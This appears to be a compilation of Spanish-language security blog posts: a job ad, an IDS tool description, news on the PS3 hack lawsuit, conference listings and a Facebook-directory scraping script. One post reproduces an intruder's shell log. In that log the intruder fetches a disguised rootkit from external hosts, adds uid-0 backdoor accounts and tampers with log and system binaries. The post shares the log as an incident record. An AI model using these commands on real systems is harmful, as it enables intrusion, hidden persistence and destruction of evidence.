Se buscan Syadmins Sr de Linux

Buenas tardes, busco Syadmins Sr de Linux para contratación
1.- bilingues ingles espanol
2.- de preferencia titulados
3.- 0 antecedentes penales
4.- para MX DF o Monterrey

conocimiento en otros unix es un+
mandenme sus CV.s

Gracias!
Ing. Angel Alejandro Vega Soto ; Unix/Linux system administrator |
| [email protected]

Patriot Host IDS

Patriot is a ‘Host IDS’ tool which allows real time monitoring of
changes in Windows systems and Network attacks.

Patriot monitors:
Changes in Registry keys: Indicating whether any sensitive key
(autorun, internet explorer settings…) is altered.
New files in ‘Startup’ directories
New Users in the System
New Services installed
Changes in the hosts file
New scheduled jobs
Alteration of the integrity of Internet Explorer: (New BHOs,
configuration changes, new toolbars)
Changes in ARP table (Prevention of MITM attacks)
Installation of new Drivers
New Netbios shares
TCP/IP Defense (New open ports, new connections made by processes,
PortScan detection…)
Files in critical directories (New executables, new DLLs…)
New hidden windows (cmd.exe / Internet Explorer using OLE objects)
Netbios connections to the System
ARP Watch (New hosts in your network)
NIDS (Detect anomalous network traffic based on editable rules)

Patriot NG 2.0: Protección frente ataques MITM from Jesús Moreno León on Vimeo.

Homepage: http://www.security-projects.com/?Patriot_NG

Otro Servidor Comprometido

A veces me pregunto como es que  Consultoras de TI , se avientan  a instalar linux, en este caso gentoo

Y son vulnerados/hackeados de una manera tan  “tonta”.

Esta bien que linux sea “seguro”, pero estan de acuerdo que se tiene que  configurar ciertas herramientas para prevenir este tipo de ataques y  peor aun que te obtengan root en el sistema.

Este log lo obtuve anoche con el permiso del administrador de la red, un servidor comprometido

#Aqui los logs

id
w
cat /etc/issue
cat /proc/infocpu
cat /proc/cpuinfo
php -v
cd /dev/shm
ls
pwd
wget linux2.go.ro/rk.jpg
ls
wget linux2.go.ro/rk.jpg
ls
w
uname -a
wget linux2.go.ro/rk.jpg
wget sentimente.zapto.org/rk.jpg
ls
pwd
pwd
wget 210.243.4.4/~local/rk.jpg
ls
tar zxfv rk.jpg
./setup teiubesccamy 20
chmod +x *
./setup teiubesccamy 20
rm -rf /usr/bin/last
rm -rf /usr/bin/lastlog
last
lastlog
mv /bin/cat /bin/cat1
nano /bin/cat
nano /bin/cat
id
pico /bin/cat
ls
./setup teiubesccamy 20
wget http://nasa.undernet.nm.ru/pico.tgz
w
/usr/sbin/useradd -o -u 0 Zomby
/usr/sbin/useradd -o -u 0 ZombyNebunu
/usr/sbin/useradd -o -u 0 zomby
/usr/sbin/userdel Zomby
/usr/sbin/userdel ZombyNebunu
/usr/sbin/useradd -o -u 0 Petru
/usr/sbin/useradd -o -u 0 Petru85
/usr/sbin/userdel Petru
/usr/sbin/userdel Petru85
/usr/sbin/useradd -o -u 0 zomby
/usr/sbin/useradd -o -u 0 zomby85
ls
cat /etc/issue
cat /etc/passwd
cat /etc/passwd
passwd zomby85
/usr/sbin/userdel zombynebunu
/usr/sbin/userdel zomby

Como liberar tu PS3

Si eres propietario de un PS3, y deseas probar software de 3ros o desarrollar tu propio software para este sistema, aqui tienes la Guia basica para liberar tu PS3.

Si en 14 simples pasos liberaras tu PS3.

NOTA: Este metodo va sin garantias, usalo bajo tu propio riesgo, nosotros no nos hacemos responsables por fallas o desperfectos despues ocacionados en tu consola…

Guía completa de GeoHot Jailbreak PS3

GeoHot ha decidido además de liberar para cargar con homebrew software casero y nada de copias caseras de los videojuegos.

El método de George Hotz es de momento el primero y por ahora el único de momento, aunque podrán ir saliendo alternativas.

No funcionan sobre antiguos homebrew y funciona sobre el firmware 3.55 (el último conocido).

Los pasos a seguir serán los siguientes:

1. Conecta una memoria USB al PC
2. Crea una carpeta raíz llamada PS3
3. Añade una carpeta llamada ” UPDATE ” que lleve a /PS3/UPDATE/
4. Descarga el Jailbreak de GeoHot ( Descargar aquí )
5. Extrae el archivo PS3UPDAT.PUP y muevelo a UPDATE en la memoria USB
6. Conecta la memoria a tu PS3
7. Navega hasta “Herramientas”
8. Elige “Actualización de sistema”
9. Opción “Actualizar desde la memoria o pendrive”
10. Reconocerá la actualización “Version 3.55-jb”, dale al OK
11. Acepta las condiciones e instala la actualización finalmente
12. Cerca de 1 minuto en actualizar ( pitará varias veces y se apagará )
13. Enciende la consola desde su botón principal
14. Después de todos los pasos ya ha sido la versión modificada firm 3.55

Informacion de Noticias2D

Demanda contra los Hackers que liberaron la PS3

Sony emprendió una acción legal contra los hackers que desmantelaron la seguridad de la consola PlayStation 3 (conocida como PS3) y contra quienes revelaron y publicaron los códigos maestros del aparato.

Estos códigos permiten que cualquier persona pueda potencialmente instalar un programa en la máquina, incluyendo juegos pirata.

Sony argumenta que dichas acciones constituyen violaciones a sus derechos de autor y fraude informático.

Pero George Hotz, uno de los hackers en el centro de la controversia, le dijo a la BBC que creía “cómodamente” que la solicitud de la compañía no iba a prosperar.

“Soy un ferviente creyente de los derechos digitales”, afirmó Hotz.

“Esperaría que una empresa que se enorgullece de su propiedad intelectual tuviera un buen conocimiento de la ley, por lo que la acción me decepciona. He hablado con un consejero legal y me siento lo suficientemente cómodo como para creer que la acción de Sony en mi contra no tiene fundamentos”, añadió.

Hotz, de 21 años, fue demandado junto con más de 100 personas asociadas al grupo de hackers conocido como fail0verflow.

En la acción judicial, presentada en un tribunal de California, Sony solicita una orden de restricción que prohíba a Hotz realizar actividades que alteren programas informáticos y prevenga la distribución del software creado a partir de sus logros.

“Trabajando de forma individual pero organizada, los acusados recientemente consiguieron saltarse las efectivas medidas de seguridad empleadas por Sony”, se lee en el documento.

“Usando internet, los acusados están distribuyendo programas, herramientas e instrucciones que brincan las medidas de protección y facilitan el contrabando de videojuegos. En este momento ya se están empacando y distribuyendo juegos pirata para estos dispositivos”, agrega.

Códigos secretos

La polémica se centra en una serie de códigos secretos que Sony utiliza para impedir que su sistema sea utilizado con fines no autorizados.

Entre ellos se encuentra un número que se emplea para autorizar los juegos y software de la PS3, con el fin de comprobar que son genuinos.

Sin embargo, si se conoce el código, éste se puede utilizar para autorizar cualquier software, incluyendo programas no autorizados y, potencialmente, juegos pirata.

La protección de la PlayStation se mantuvo impenetrable durante siete años, pero miembros de fail0verflow lograron romper la seguridad en diciembre. Después Hotz, usando un método similar, consiguió el código maestro.

El sitio de web de fail0verflow desapareció de la noche a la mañana y fue reemplazado por un mensaje titulado “Sony nos demandó”.

En él, los hackers dijeron: “Nunca hemos aprobado, apoyado o motivado la piratería en videojuegos”.

“Nunca hemos publicado ningún código. No hemos publicado ningún código de Sony o códigos derivados de Sony”, añadieron.

Y aseguraron: “Nuestro objetivo exclusivo era, y siempre ha sido, lograr que regresara la opción de instalar Otro Sistema Operativo”.

El grupo se refiere a una opción que Sony deshabilitó -después de que Hotz lograra por primera vez romper la seguridad de la consola hace unos meses- y que permitía instalar otros programas como Linux en la PS3.

Información de Semana.com

Hackers to Hackers Conference en Cancun

Deciembre 3 del 2010 en el Hotel Melia

http://www.h2hc.com.br/?venue=cancun&lang=en

Conferencistas Confirmados

Understanding the Windows SMB NTLM Weak Nonce Vulnerability
Hacking the Fast Lane: security issues with 802.11p, DSRC, and WAVE
Finding bugs and publishing advisories, the Core Security way
Malicious cryptography techniques for unreverseable computer viruses
Enhanced Mitigation Experience Toolkit 2.0
Transferring files on isolated remote desktop environments using windows messages
Generic exploitation of invalid memory writes
Blue Screen Of Death Is Dead
Vulnerabilidades en Modems de Mexico 2010+
Scoring PDF structure to detect malicious files

Lista de Talleres

1 – Web Testing & Exploiting Workshop

Instructor: Nahuel Grisolia

Total seats: 18

Vacancies: 18

Minimum required: 8

Duration: 16 hours

Date: 01 and 02 of december 2010

Bring your own Laptop: Yes

Language: Spanish

2 – Windows physical memory acquisition and analysis

Instructor: Matthieu Suiche

Total seats: 18

Vacancies: 18

Minimum required: 5

Duration: 16 hours

Date: 01 and 02 of december 2010

Bring your own Laptop: Yes

Language: English

3 – Detection and operational cryptanalysis of weakly implemented or trapped encryption systems

Instructor: Eric Filiol

Total seats: 18

Vacancies: 18

Minimum Required: 5

Duration: 8 hours

Date: 02 of december 2010

Bring your own Laptop: Yes

Language: English

4 – Breaking the Glass

Instructor: Jonathan Brossard

Total seats: 18

Vacancies: 18

Minimum Required: 5

Duration: 16 hours

Date: 01 and 02 of december 2010

Bring your own Laptop: Yes

Language: Spanish

Congreso Seguridad en Cómputo

La Universidad Nacional Autónoma de México a través de la Subdirección de Seguridad de la Información/UNAM-CERT de la Dirección General de Cómputo y de Tecnologías de Información y Comunicación organiza el “Congreso Seguridad en Cómputo 2010”.

La seguridad de la información es una de las principales necesidades actuales de los individuos y las organizaciones en México y a nivel mundial. El “Congreso Seguridad en Cómputo 2010” es un foro que reúne a investigadores y líderes en seguridad informática, reconocidos a nivel mundial, con los asistentes al congreso: especialistas en seguridad informática, administradores de tecnología, directores de TIC, estudiantes de licenciatura y posgrados en informática, sistemas, seguridad de la información, personas interesadas en los temas más actuales en seguridad de la información de todo el país y de Latinoamérica, de organizaciones y empresas de los sectores público, educativo, privado, financiero, etc. En este foro se presentarán y analizarán las tendencias más recientes en seguridad de la información.

El Congreso Seguridad en Cómputo 2010 está dividido en dos fases: Capacitación especializada en seguridad de la información en las Líneas de Especialización y el Ciclo de Conferencias, impartidas por reconocidos expertos en la materia.

Las Líneas de Especialización se llevarán a cabo del 24 al 29 de noviembre de 2010 y tendrán como sede el Centro de Extensión Tlatelolco. El Ciclo de Conferencias tendrá lugar los días 30 de noviembre y 1o de diciembre de 2010 en el Palacio de la Escuela de Medicina.

Vulnerabilidad de facebook

El hacker Ron Bowles, puso en duda los filtros de seguridad de Facebook, al publicar la información de 100 millones de perfiles.

El especialista en temas de seguridad en Internet, dijo que el fin
de esta publicación es demostrar los problemas de privacidad que tiene
esta red social, según publica El País

Alrededor de mil cibernautas compartieron la lista a través del sitio Pirate Bay, donde fue “subida” el pasado miércoles a las 16:58 horas.

URL

Además, el especialista puso a disposición el código que utilizó para lograr violar los filtros de seguridad de Facebook.

De acuerdo con El País, esta red social anunció, mediante un
comunicado enviado a la BBC, que dicha información revelada por Bowes
ya era pública en un directorio que recoge a todos los usuarios cuyo
perfil está abierto, aunque sea parcialmente

Fuente: radiopirata.com

update:

facebook.rb

#!/usr/bin/ruby

# This was a quick hack to download Facebook URLs from 
# http://www.facebook.com/directory
#
# @author Ron Bowes
# @date 2010-07-11

require 'net/http'
require 'uri'

File.open("input.txt", "r") do |infile|
	while (path = infile.gets) do
		if(path =~ /directory/) then
			attempts = 0
			while true do
				begin
					count = 0
					$stderr.puts("PATH: " + path)
					url = URI.parse(path)
					res = Net::HTTP.start(url.host, url.port) {|http|
						http.get(url.path, {"User-agent"=>"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"})
					}
					links = res.body.scan(/UIDirectoryBox_Item.*?a href="(.*?)"/)
				
					links.each { |link|
						link = link.shift
						puts link
						count = count + 1
					}
					$stderr.puts("Found %d links!" % count)

					if(count == 0) then
						attempts = attempts + 1
						if(attempts > 3)
							$stderr.puts("Giving up!")
							break
						else
							$stderr.puts("Found no links, trying again (%d retries left)!" % (3 - attempts))
						end
						sleep(10)
					else
						break
					end
				rescue Exception
					$stderr.puts("ERROR: " + $!)
					sleep(30)
				end
			end
		else
			$stderr.puts("Skipping: " + path)
			puts(path)
		end
	end
end